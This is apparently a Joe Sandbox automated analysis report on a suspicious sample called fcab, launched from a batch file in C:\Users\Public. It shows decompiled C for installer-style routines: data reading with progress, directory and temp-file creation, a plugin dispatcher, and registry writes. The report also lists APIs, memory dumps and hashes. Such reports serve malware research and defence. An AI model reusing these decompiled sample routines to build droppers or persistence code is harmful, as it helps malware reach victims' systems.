                                                          control_flow_graph 696 4030fa-403111 697 403113 696->697 698 40311a-403122 696->698 697->698 699 403124 698->699 700 403129-40312e 698->700 699->700 701 403130-403139 call 4032f5 700->701 702 40313e-40314b call 4032df 700->702 701->702 706 403151-403155 702->706 707 403296 702->707 708 40315b-40317b GetTickCount call 406787 706->708 709 40327f-403281 706->709 710 403298-403299 707->710 722 4032d5 708->722 724 403181-403189 708->724 712 403283-403286 709->712 713 4032ca-4032ce 709->713 711 4032d8-4032dc 710->711 715 403288 712->715 716 40328b-403294 call 4032df 712->716 717 4032d0 713->717 718 40329b-4032a1 713->718 715->716 716->707 730 4032d2 716->730 717->722 720 4032a3 718->720 721 4032a6-4032b4 call 4032df 718->721 720->721 721->707 733 4032b6-4032c2 call 405df0 721->733 722->711 727 40318b 724->727 728 40318e-40319c call 4032df 724->728 727->728 728->707 734 4031a2-4031ab 728->734 730->722 739 4032c4-4032c7 733->739 740 40327b-40327d 733->740 736 4031b1-4031ce call 4067a7 734->736 742 4031d4-4031eb GetTickCount 736->742 743 403277-403279 736->743 739->713 740->710 744 403236-403238 742->744 745 4031ed-4031f5 742->745 743->710 748 40323a-40323e 744->748 749 40326b-40326f 744->749 746 4031f7-4031fb 745->746 747 4031fd-40322e MulDiv wsprintfW call 4052b0 745->747 746->744 746->747 755 403233 747->755 752 403240-403245 call 405df0 748->752 753 403253-403259 748->753 749->724 750 403275 749->750 750->722 758 40324a-40324c 752->758 754 40325f-403263 753->754 754->736 757 403269 754->757 755->744 757->722 758->740 759 40324e-403251 758->759 759->754
                                                          C-Code - Quality: 94%
                                                          			E004030FA(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
				signed int _v8;
				int _v12;
				long _v16;
				intOrPtr _v20;
				short _v148;
				void* _t59;
				intOrPtr _t69;
				long _t70;
				void* _t71;
				intOrPtr _t81;
				intOrPtr _t86;
				long _t89;
				signed int _t90;
				int _t91;
				int _t92;
				intOrPtr _t93;
				void* _t94;
				void* _t95;

				_t90 = _a16;
				_t86 = _a12;
				_v12 = _t90;
				if(_t86 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_t81 = _t86;
				if(_t86 == 0) {
					_t81 = 0x410ea0;
				}
				_t56 = _a4;
				if(_a4 >= 0) {
					E004032F5( *0x42a278 + _t56);
				}
				if(E004032DF( &_a16, 4) == 0) {
					L33:
					_push(0xfffffffd);
					goto L34;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t86 == 0) {
							while(_a16 > 0) {
								_t91 = _v12;
								if(_a16 < _t91) {
									_t91 = _a16;
								}
								if(E004032DF(0x40cea0, _t91) == 0) {
									goto L33;
								} else {
									if(E00405DF0(_a8, 0x40cea0, _t91) == 0) {
										L28:
										_push(0xfffffffe);
										L34:
										_pop(_t59);
										return _t59;
									}
									_v8 = _v8 + _t91;
									_a16 = _a16 - _t91;
									continue;
								}
							}
							L43:
							return _v8;
						}
						if(_a16 < _t90) {
							_t90 = _a16;
						}
						if(E004032DF(_t86, _t90) != 0) {
							_v8 = _t90;
							goto L43;
						} else {
							goto L33;
						}
					}
					_v16 = GetTickCount();
					E00406787(0x40ce10);
					_t13 =  &_a16;
					 *_t13 = _a16 & 0x7fffffff;
					_a4 = _a16;
					if( *_t13 <= 0) {
						goto L43;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t92 = 0x4000;
						if(_a16 < 0x4000) {
							_t92 = _a16;
						}
						if(E004032DF(0x40cea0, _t92) == 0) {
							goto L33;
						}
						_a16 = _a16 - _t92;
						 *0x40ce28 = 0x40cea0;
						 *0x40ce2c = _t92;
						while(1) {
							 *0x40ce30 = _t81;
							 *0x40ce34 = _v12; // executed
							_t69 = E004067A7(0x40ce10); // executed
							_v20 = _t69;
							if(_t69 < 0) {
								break;
							}
							_t93 =  *0x40ce30; // 0x410ea0
							_t94 = _t93 - _t81;
							_t70 = GetTickCount();
							_t89 = _t70;
							if(( *0x42a2d4 & 0x00000001) != 0 && (_t70 - _v16 > 0xc8 || _a16 == 0)) {
								wsprintfW( &_v148, L"... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t95 = _t95 + 0xc;
								E004052B0(0,  &_v148); // executed
								_v16 = _t89;
							}
							if(_t94 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L43;
							} else {
								if(_a12 != 0) {
									_v8 = _v8 + _t94;
									_v12 = _v12 - _t94;
									_t81 =  *0x40ce30; // 0x410ea0
									L23:
									if(_v20 != 1) {
										continue;
									}
									goto L43;
								}
								_t71 = E00405DF0(_a8, _t81, _t94); // executed
								if(_t71 == 0) {
									goto L28;
								}
								_v8 = _v8 + _t94;
								goto L23;
							}
						}
						_push(0xfffffffc);
						goto L34;
					}
					goto L33;
				}
			}





















                                                          0x00403105
                                                          0x00403109
                                                          0x0040310c
                                                          0x00403111
                                                          0x00403113
                                                          0x00403113
                                                          0x0040311a
                                                          0x0040311e
                                                          0x00403122
                                                          0x00403124
                                                          0x00403124
                                                          0x00403129
                                                          0x0040312e
                                                          0x00403139
                                                          0x00403139
                                                          0x0040314b
                                                          0x00403296
                                                          0x00403296
                                                          0x00000000
                                                          0x00403151
                                                          0x00403155
                                                          0x00403281
                                                          0x004032ca
                                                          0x0040329b
                                                          0x004032a1
                                                          0x004032a3
                                                          0x004032a3
                                                          0x004032b4
                                                          0x00000000
                                                          0x004032b6
                                                          0x004032c2
                                                          0x0040327b
                                                          0x0040327b
                                                          0x00403298
                                                          0x00403298
                                                          0x00000000
                                                          0x00403298
                                                          0x004032c4
                                                          0x004032c7
                                                          0x00000000
                                                          0x004032c7
                                                          0x004032b4
                                                          0x004032d5
                                                          0x00000000
                                                          0x004032d5
                                                          0x00403286
                                                          0x00403288
                                                          0x00403288
                                                          0x00403294
                                                          0x004032d2
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00403294
                                                          0x00403166
                                                          0x00403169
                                                          0x0040316e
                                                          0x0040316e
                                                          0x00403178
                                                          0x0040317b
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00403181
                                                          0x00403181
                                                          0x00403181
                                                          0x00403189
                                                          0x0040318b
                                                          0x0040318b
                                                          0x0040319c
                                                          0x00000000
                                                          0x00000000
                                                          0x004031a2
                                                          0x004031a5
                                                          0x004031ab
                                                          0x004031b1
                                                          0x004031b9
                                                          0x004031bf
                                                          0x004031c4
                                                          0x004031cb
                                                          0x004031ce
                                                          0x00000000
                                                          0x00000000
                                                          0x004031d4
                                                          0x004031da
                                                          0x004031dc
                                                          0x004031e9
                                                          0x004031eb
                                                          0x0040321c
                                                          0x00403222
                                                          0x0040322e
                                                          0x00403233
                                                          0x00403233
                                                          0x00403238
                                                          0x0040326f
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040323a
                                                          0x0040323e
                                                          0x00403253
                                                          0x00403256
                                                          0x00403259
                                                          0x0040325f
                                                          0x00403263
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00403269
                                                          0x00403245
                                                          0x0040324c
                                                          0x00000000
                                                          0x00000000
                                                          0x0040324e
                                                          0x00000000
                                                          0x0040324e
                                                          0x00403238
                                                          0x00403277
                                                          0x00000000
                                                          0x00403277
                                                          0x00000000
                                                          0x00403181

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.644793479.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.644775997.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644817233.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fcab.jbxd
                                                          Similarity
                                                          • API ID: CountTick$wsprintf
                                                          • String ID: ... %d%%
                                                          • API String ID: 551687249-2449383134
                                                          • Opcode ID: ec08b81ccf01a23b3f2095c025c940c6288906fc183749b0f6cb8fc1ea750618
                                                          • Instruction ID: 2f3e22fda6cf622f8bf4b8160786ddb998526db62ce5623fe0a3028d3f0862ac
                                                          • Opcode Fuzzy Hash: ec08b81ccf01a23b3f2095c025c940c6288906fc183749b0f6cb8fc1ea750618
                                                          • Instruction Fuzzy Hash: A3517171900219EBCB10DF65DA48B9F3B68AF45366F1441BFF805B72C0D7789E508BA9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040577F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 760 40577f-4057ca CreateDirectoryW 761 4057d0-4057dd GetLastError 760->761 762 4057cc-4057ce 760->762 763 4057f7-4057f9 761->763 764 4057df-4057f3 SetFileSecurityW 761->764 762->763 764->762 765 4057f5 GetLastError 764->765 765->763
                                                          C-Code - Quality: 100%
                                                          			E0040577F(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083f0;
				_v36.Group = 0x4083f0;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x4083e0;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}







                                                          0x0040578a
                                                          0x0040578e
                                                          0x00405791
                                                          0x00405797
                                                          0x0040579b
                                                          0x0040579f
                                                          0x004057a7
                                                          0x004057ae
                                                          0x004057b4
                                                          0x004057bb
                                                          0x004057c2
                                                          0x004057ca
                                                          0x004057cc
                                                          0x00000000
                                                          0x004057cc
                                                          0x004057d6
                                                          0x004057dd
                                                          0x004057f3
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004057f5
                                                          0x004057f9

                                                          APIs
                                                          • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057C2
                                                          • GetLastError.KERNEL32 ref: 004057D6
                                                          • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004057EB
                                                          • GetLastError.KERNEL32 ref: 004057F5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.644793479.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.644775997.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644817233.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fcab.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                          • String ID: C:\Users\Public
                                                          • API String ID: 3449924974-2272764151
                                                          • Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                          • Instruction ID: a96db4d766433405fa600e453148f039d13b259e3fca1cfbe784ddd29ae139cf
                                                          • Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                          • Instruction Fuzzy Hash: 52010871C10619DADF01DFA4CD44BEFBBB8EB14355F00407AD545B6281E7789608DFA9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00405D6D Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 766 405d6d-405d79 767 405d7a-405dae GetTickCount GetTempFileNameW 766->767 768 405db0-405db2 767->768 769 405dbd-405dbf 767->769 768->767 770 405db4 768->770 771 405db7-405dba 769->771 770->771
                                                          C-Code - Quality: 100%
                                                          			E00405D6D(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a55c; // 0x61
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}












                                                          0x00405d73
                                                          0x00405d79
                                                          0x00405d7a
                                                          0x00405d7a
                                                          0x00405d7f
                                                          0x00405d80
                                                          0x00405d83
                                                          0x00405d88
                                                          0x00405d8b
                                                          0x00405d95
                                                          0x00405da2
                                                          0x00405da6
                                                          0x00405dae
                                                          0x00000000
                                                          0x00000000
                                                          0x00405db2
                                                          0x00000000
                                                          0x00405db4
                                                          0x00405db4
                                                          0x00405db4
                                                          0x00405db7
                                                          0x00405dba
                                                          0x00405dba
                                                          0x00405dbd
                                                          0x00000000

                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 00405D8B
                                                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\Public\fcab.bat" ,0040333B,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74D0FAA0,00403589), ref: 00405DA6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.644793479.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.644775997.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644817233.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fcab.jbxd
                                                          Similarity
                                                          • API ID: CountFileNameTempTick
                                                          • String ID: "C:\Users\Public\fcab.bat" $C:\Users\user\AppData\Local\Temp\$nsa
                                                          • API String ID: 1716503409-624479515
                                                          • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                          • Instruction ID: 85bdb6a116c51bdc328f0f27a7d8b9c38e3c9c6247ffb38d9ffcafb3e867c1bf
                                                          • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                          • Instruction Fuzzy Hash: D2F03076601704FBEB009F69ED09F9FB7ADEF95710F10803BE901E7250E6B0A9548B64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 10001759 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 772 10001759-10001795 call 10001b18 776 100018a6-100018a8 772->776 777 1000179b-1000179f 772->777 778 100017a1-100017a7 call 10002286 777->778 779 100017a8-100017b5 call 100022d0 777->779 778->779 784 100017e5-100017ec 779->784 785 100017b7-100017bc 779->785 786 1000180c-10001810 784->786 787 100017ee-1000180a call 100024a4 call 100015b4 call 10001272 GlobalFree 784->787 788 100017d7-100017da 785->788 789 100017be-100017bf 785->789 793 10001812-1000184c call 100015b4 call 100024a4 786->793 794 1000184e-10001854 call 100024a4 786->794 810 10001855-10001859 787->810 788->784 795 100017dc-100017dd call 10002b57 788->795 791 100017c1-100017c2 789->791 792 100017c7-100017c8 call 1000289c 789->792 799 100017c4-100017c5 791->799 800 100017cf-100017d5 call 10002640 791->800 806 100017cd 792->806 793->810 794->810 803 100017e2 795->803 799->784 799->792 809 100017e4 800->809 803->809 806->803 809->784 815 10001896-1000189d 810->815 816 1000185b-10001869 call 10002467 810->816 815->776 818 1000189f-100018a0 GlobalFree 815->818 822 10001881-10001888 816->822 823 1000186b-1000186e 816->823 818->776 822->815 825 1000188a-10001895 call 1000153d 822->825 823->822 824 10001870-10001878 823->824 824->822 826 1000187a-1000187b FreeLibrary 824->826 825->815 826->822
                                                          C-Code - Quality: 92%
                                                          			E10001759(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void _v36;
				struct HINSTANCE__* _t34;
				intOrPtr _t38;
				void* _t44;
				void* _t45;
				void* _t46;
				void* _t50;
				intOrPtr _t53;
				signed int _t57;
				signed int _t61;
				void* _t65;
				void* _t66;
				void* _t70;
				void* _t74;

				_t74 = __esi;
				_t66 = __edi;
				_t65 = __edx;
				 *0x1000406c = _a8;
				 *0x10004070 = _a16;
				 *0x10004074 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x10004048, E100015B1);
				_push(1); // executed
				_t34 = E10001B18(); // executed
				_t50 = _t34;
				if(_t50 == 0) {
					L28:
					return _t34;
				} else {
					if( *((intOrPtr*)(_t50 + 4)) != 1) {
						E10002286(_t50);
					}
					_push(_t50);
					E100022D0(_t65);
					_t53 =  *((intOrPtr*)(_t50 + 4));
					if(_t53 == 0xffffffff) {
						L14:
						if(( *(_t50 + 0x1010) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t50 + 4)) == 0) {
								_t34 = E100024A4(_t50);
							} else {
								_push(_t74);
								_push(_t66);
								_t12 = _t50 + 0x1018; // 0x1018
								_t57 = 8;
								memcpy( &_v36, _t12, _t57 << 2);
								_t38 = E100015B4(_t50);
								_t15 = _t50 + 0x1018; // 0x1018
								_t70 = _t15;
								 *((intOrPtr*)(_t50 + 0x1020)) = _t38;
								 *_t70 = 4;
								E100024A4(_t50);
								_t61 = 8;
								_t34 = memcpy(_t70,  &_v36, _t61 << 2);
							}
						} else {
							E100024A4(_t50);
							_t34 = GlobalFree(E10001272(E100015B4(_t50)));
						}
						if( *((intOrPtr*)(_t50 + 4)) != 1) {
							_t34 = E10002467(_t50);
							if(( *(_t50 + 0x1010) & 0x00000040) != 0 &&  *_t50 == 1) {
								_t34 =  *(_t50 + 0x1008);
								if(_t34 != 0) {
									_t34 = FreeLibrary(_t34);
								}
							}
							if(( *(_t50 + 0x1010) & 0x00000020) != 0) {
								_t34 = E1000153D( *0x10004068);
							}
						}
						if(( *(_t50 + 0x1010) & 0x00000002) != 0) {
							goto L28;
						} else {
							return GlobalFree(_t50);
						}
					}
					_t44 =  *_t50;
					if(_t44 == 0) {
						if(_t53 != 1) {
							goto L14;
						}
						E10002B57(_t50);
						L12:
						_t50 = _t44;
						L13:
						goto L14;
					}
					_t45 = _t44 - 1;
					if(_t45 == 0) {
						L8:
						_t44 = E1000289C(_t53, _t50); // executed
						goto L12;
					}
					_t46 = _t45 - 1;
					if(_t46 == 0) {
						E10002640(_t50);
						goto L13;
					}
					if(_t46 != 1) {
						goto L14;
					}
					goto L8;
				}
			}

















                                                          0x10001759
                                                          0x10001759
                                                          0x10001759
                                                          0x10001763
                                                          0x1000176b
                                                          0x10001778
                                                          0x10001786
                                                          0x10001789
                                                          0x1000178b
                                                          0x10001790
                                                          0x10001795
                                                          0x100018a8
                                                          0x100018a8
                                                          0x1000179b
                                                          0x1000179f
                                                          0x100017a2
                                                          0x100017a7
                                                          0x100017a8
                                                          0x100017a9
                                                          0x100017af
                                                          0x100017b5
                                                          0x100017e5
                                                          0x100017ec
                                                          0x10001810
                                                          0x1000184f
                                                          0x10001812
                                                          0x10001812
                                                          0x10001813
                                                          0x10001816
                                                          0x1000181c
                                                          0x10001820
                                                          0x10001823
                                                          0x10001828
                                                          0x10001828
                                                          0x1000182f
                                                          0x10001835
                                                          0x1000183b
                                                          0x10001847
                                                          0x10001848
                                                          0x1000184b
                                                          0x100017ee
                                                          0x100017ef
                                                          0x10001804
                                                          0x10001804
                                                          0x10001859
                                                          0x1000185c
                                                          0x10001869
                                                          0x10001870
                                                          0x10001878
                                                          0x1000187b
                                                          0x1000187b
                                                          0x10001878
                                                          0x10001888
                                                          0x10001890
                                                          0x10001895
                                                          0x10001888
                                                          0x1000189d
                                                          0x00000000
                                                          0x1000189f
                                                          0x00000000
                                                          0x100018a0
                                                          0x1000189d
                                                          0x100017b9
                                                          0x100017bc
                                                          0x100017da
                                                          0x00000000
                                                          0x00000000
                                                          0x100017dd
                                                          0x100017e2
                                                          0x100017e2
                                                          0x100017e4
                                                          0x00000000
                                                          0x100017e4
                                                          0x100017be
                                                          0x100017bf
                                                          0x100017c7
                                                          0x100017c8
                                                          0x00000000
                                                          0x100017c8
                                                          0x100017c1
                                                          0x100017c2
                                                          0x100017d0
                                                          0x00000000
                                                          0x100017d0
                                                          0x100017c5
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x100017c5

                                                          APIs
                                                            • Part of subcall function 10001B18: GlobalFree.KERNEL32 ref: 10001D83
                                                            • Part of subcall function 10001B18: GlobalFree.KERNEL32 ref: 10001D88
                                                            • Part of subcall function 10001B18: GlobalFree.KERNEL32 ref: 10001D8D
                                                          • GlobalFree.KERNEL32 ref: 10001804
                                                          • FreeLibrary.KERNEL32(?), ref: 1000187B
                                                          • GlobalFree.KERNEL32 ref: 100018A0
                                                            • Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,8BC3C95B), ref: 100022B8
                                                            • Part of subcall function 10002640: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B2
                                                            • Part of subcall function 100015B4: lstrcpyW.KERNEL32 ref: 100015CD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.667355155.0000000010001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000002.00000002.667337465.0000000010000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                          • Associated: 00000002.00000002.667366350.0000000010003000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                          • Associated: 00000002.00000002.667376456.0000000010005000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_10000000_fcab.jbxd
                                                          Similarity
                                                          • API ID: Global$Free$Alloc$Librarylstrcpy
                                                          • String ID:
                                                          • API String ID: 1791698881-3916222277
                                                          • Opcode ID: 80a71440bbdc6676df6433b68331a89e098fd0a61e7fd3645cfd834030fcbe9d
                                                          • Instruction ID: 65685ba44f5e0dd4e22f20931bb662b0f8110762eb821eef9687284fed8b6370
                                                          • Opcode Fuzzy Hash: 80a71440bbdc6676df6433b68331a89e098fd0a61e7fd3645cfd834030fcbe9d
                                                          • Instruction Fuzzy Hash: 4A31AC75804241AAFB14DF649CC9BDA37E8FF043D4F158065FA0AAA08FDFB4A984C761
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004023DE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 83%
                                                          			E004023DE(void* __eax, int __ebx, intOrPtr __edx) {
				void* _t20;
				void* _t21;
				int _t24;
				long _t25;
				int _t30;
				intOrPtr _t33;
				void* _t34;
				intOrPtr _t37;
				void* _t39;
				void* _t42;

				_t33 = __edx;
				_t30 = __ebx;
				_t37 =  *((intOrPtr*)(_t39 - 0x18));
				_t34 = __eax;
				 *(_t39 - 0x4c) =  *(_t39 - 0x14);
				 *(_t39 - 0x3c) = E00402C37(2);
				_t20 = E00402C37(0x11);
				 *(_t39 - 4) = 1;
				_t21 = E00402CC7(_t42, _t34, _t20, 2); // executed
				 *(_t39 + 8) = _t21;
				if(_t21 != __ebx) {
					_t24 = 0;
					if(_t37 == 1) {
						E00402C37(0x23);
						_t24 = lstrlenW(0x40b5a8) + _t29 + 2;
					}
					if(_t37 == 4) {
						 *0x40b5a8 = E00402C15(3);
						 *((intOrPtr*)(_t39 - 0x30)) = _t33;
						_t24 = _t37;
					}
					if(_t37 == 3) {
						_t24 = E004030FA( *((intOrPtr*)(_t39 - 0x1c)), _t30, 0x40b5a8, 0x1800);
					}
					_t25 = RegSetValueExW( *(_t39 + 8),  *(_t39 - 0x3c), _t30,  *(_t39 - 0x4c), 0x40b5a8, _t24); // executed
					if(_t25 == 0) {
						 *(_t39 - 4) = _t30;
					}
					_push( *(_t39 + 8));
					RegCloseKey();
				}
				 *0x42a2a8 =  *0x42a2a8 +  *(_t39 - 4);
				return 0;
			}













                                                          0x004023de
                                                          0x004023de
                                                          0x004023de
                                                          0x004023e1
                                                          0x004023e8
                                                          0x004023f2
                                                          0x004023f5
                                                          0x004023fe
                                                          0x00402405
                                                          0x0040240c
                                                          0x0040240f
                                                          0x00402415
                                                          0x0040241f
                                                          0x00402423
                                                          0x0040242e
                                                          0x0040242e
                                                          0x00402435
                                                          0x0040243f
                                                          0x00402445
                                                          0x00402448
                                                          0x00402448
                                                          0x0040244c
                                                          0x00402458
                                                          0x00402458
                                                          0x00402469
                                                          0x00402471
                                                          0x00402473
                                                          0x00402473
                                                          0x00402476
                                                          0x00402551
                                                          0x00402551
                                                          0x00402ac2
                                                          0x00402ace

                                                          APIs
                                                          • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsjD2A6.tmp,00000023,00000011,00000002), ref: 00402429
                                                          • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsjD2A6.tmp,00000000,00000011,00000002), ref: 00402469
